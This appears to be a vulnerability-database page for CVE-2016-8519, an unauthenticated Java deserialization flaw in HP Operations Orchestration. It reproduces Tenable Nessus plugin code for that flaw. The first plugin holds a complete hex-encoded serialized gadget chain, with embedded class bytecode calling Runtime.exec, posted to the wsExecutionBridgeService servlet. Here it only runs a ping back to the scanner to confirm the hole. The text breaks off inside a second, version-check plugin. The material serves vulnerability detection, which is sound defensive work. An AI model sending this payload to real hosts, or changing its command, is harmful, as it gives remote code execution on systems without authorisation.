Vulnerabilities > CVE-2016-8519 - Deserialization of Untrusted Data vulnerability in HP Operations Orchestration
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
A remote code execution vulnerability in HPE Operations Orchestration Community edition and Enterprise edition prior to v10.70 was found.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 |
Common Weakness Enumeration (CWE)
Nessus
NASL family CGI abuses NASL id HP_OPERATIONS_ORCHESTRATION_BRIDGE_EXEC.NASL description The version of HP Operations Orchestration running on the remote host is affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 96532 published 2017-01-16 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96532 title HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(96532); script_version("1.9"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2016-8519"); script_bugtraq_id(95225); script_xref(name:"HP", value:"HPSBGN03688"); script_xref(name:"HP", value:"emr_na-c05361944"); script_xref(name:"ZDI", value:"ZDI-17-001"); script_name(english:"HP Operations Orchestration wsExecutionBridgeService Servlet Java Object Deserialization RCE"); script_summary(english:"Tries to execute a command via deserialization."); script_set_attribute(attribute:"synopsis", value: "The remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of HP Operations Orchestration running on the remote host is affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code."); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05361944 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6db3b8a9"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-001/"); script_set_attribute(attribute:"solution", value: "Upgrade to HP Operations Orchestration version 10.70 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-8519"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"patch_publication_date", value:"2017/01/03"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/16"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:operations_orchestration"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("hp_operations_orchestration_detect.nbin"); script_require_keys("installed_sw/HP Operations Orchestration"); script_require_ports("Services/www", 8080, 8443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); appname = "HP Operations Orchestration"; get_install_count(app_name:appname, exit_if_zero:TRUE); port = get_http_port(default:8080); install = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE); soc = open_sock_tcp(port); if (!soc) audit(AUDIT_SOCK_FAIL, port, appname); # serialized beansutils to execute ping -n 10 xxx beansutils = '\xac\xed\x00\x05\x73\x72\x00\x49\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x4d\x65\x74\x68\x6f\x64\x49\x6e\x76\x6f\x6b\x65\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\xb2\x4a\xb4\x07\x8b\x41\x1a\xd7\x02\x00\x03\x49\x00\x05\x69\x6e\x64\x65\x78\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x08\x70\x72\x6f\x76\x69\x64\x65\x72\x74\x00\x3f\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x63\x6f\x72\x65\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x3b\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x7d\x00\x00\x00\x01\x00\x3d\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x63\x6f\x72\x65\x2e\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x54\x79\x70\x65\x57\x72\x61\x70\x70\x65\x72\x24\x54\x79\x70\x65\x50\x72\x6f\x76\x69\x64\x65\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x07\x67\x65\x74\x54\x79\x70\x65\x73\x7d\x00\x00\x00\x02\x00\x16\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x54\x79\x70\x65\x00\x1d\x6a\x61\x76\x61\x78\x2e\x78\x6d\x6c\x2e\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x78\x71\x00\x7e\x00\x06\x73\x72\x00\x60\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x73\x75\x70\x70\x6f\x72\x74\x2e\x41\x75\x74\x6f\x77\x69\x72\x65\x55\x74\x69\x6c\x73\x24\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x44\x65\x6c\x65\x67\x61\x74\x69\x6e\x67\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x85\x62\xcb\xc0\x0c\xfd\x31\x13\x02\x00\x01\x4c\x00\x0d\x6f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x31\x4c\x6f\x72\x67\x2f\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2f\x62\x65\x61\x6e\x73\x2f\x66\x61\x63\x74\x6f\x72\x79\x2f\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x2f\x6f\x72\x67\x2e\x73\x70\x72\x69\x6e\x67\x66\x72\x61\x6d\x65\x77\x6f\x72\x6b\x2e\x62\x65\x61\x6e\x73\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x4f\x62\x6a\x65\x63\x74\x46\x61\x63\x74\x6f\x72\x79\x78\x71\x00\x7e\x00\x06\x73\x71\x00\x7e\x00\x09\x73\x71\x00\x7e\x00\x0d\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x09\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x01\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70'; body = '\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x3c\x0a\x00\x03\x00\x22\x07\x00\x3a\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x07\x00\x30\x01\x00\x03\x63\x6d\x64\x08\x00\x32\x01'; trailer = '\x75\x71\x00\x7e\x00\x21\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x1b\x0a\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3b\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78\x71\x00\x7e\x00\x26'; cmd_ping = '/c ping -n 10 ' + compat::this_host(); cmd_ping = mkword(len(cmd_ping)) + cmd_ping; cmd_ping += '\x08\x00\x34\x01\x00\x04\x65\x78\x65\x63\x01\x00\x28\x28\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x36\x00\x37\x0a\x00\x2b\x00\x38\x01\x00\x1c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x01\x00\x1e\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x32\x37\x34\x35\x33\x36\x30\x34\x30\x33\x34\x31\x39\x3b\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2e\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x3b\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0e\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x3b\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00\x01\x00\x0c\x00\x00\x00\x27\x00\x06\x00\x02\x00\x00\x00\x1b\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x05\xbd\x00\x31\x59\x03\x12\x33\x53\x59\x04\x12\x35\x53\xb6\x00\x39\x57\xb1\x00\x00\x00\x00\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x23\x00\x10\x00\x09'; body += cmd_ping; beansutils += mkdword(len(body)) + body; beansutils += trailer; http_request = 'POST /oo/backwards-compatibility/wsExecutionBridgeService HTTP/1.0\r\n' + 'Host: ' + get_host_ip() + ':' + port + '\r\n' + 'Content-Type: application/x-java-serialized-object; charset=utf-8\r\n' + 'Content-Length: ' + len(beansutils) + '\r\n' + '\r\n' + beansutils; filter = "icmp and icmp[0] = 8 and src host " + get_host_ip(); response = send_capture(socket:soc, data:http_request, pcap_filter:filter); icmp = tolower(hexstr(get_icmp_element(icmp:response, element:"data"))); close(soc); # No response, meaning we didn't get in if(isnull(icmp)) audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]); report = '\nNessus was able to exploit a Java deserialization vulnerability by' + '\nsending a crafted Java object.' + '\n'; security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);NASL family CGI abuses NASL id HP_OPERATIONS_ORCHESTRATION_HPSBGN03688.NASL description The version of HP Operations Orchestration running on the remote host is 10.x prior to 10.70. It is, therefore, affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. Note that this vulnerability only affects the Community and Enterprise editions. last seen 2020-06-01 modified 2020-06-02 plugin id 96449 published 2017-01-12 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96449 title HP Operations Orchestration 10.x < 10.70 wsExecutionBridgeService Servlet Java Object Deserialization RCE code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(96449); script_version("1.9"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2016-8519"); script_bugtraq_id(95225); script_xref(name:"HP", value:"HPSBGN03688"); script_xref(name:"HP", value:"emr_na-c05361944"); script_xref(name:"ZDI", value:"ZDI-17-001"); script_name(english:"HP Operations Orchestration 10.x < 10.70 wsExecutionBridgeService Servlet Java Object Deserialization RCE"); script_summary(english:"Checks the HP Operations Orchestration version."); script_set_attribute(attribute:"synopsis", value: "The remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of HP Operations Orchestration running on the remote host is 10.x prior to 10.70. It is, therefore, affected by a remote code execution vulnerability in the wsExecutionBridgeService servlet due to improper validation of user-supplied input before deserialization. An unauthenticated, remote attacker can exploit this, by sending a crafted serialized Java object, to execute arbitrary code. Note that this vulnerability only affects the Community and Enterprise editions."); # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05361944 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6db3b8a9"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-001/"); script_set_attribute(attribute:"solution", value: "Upgrade to HP Operations Orchestration version 10.70 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-8519"); script_set_attribute(attribute:"exploitability_ease", value:"No known 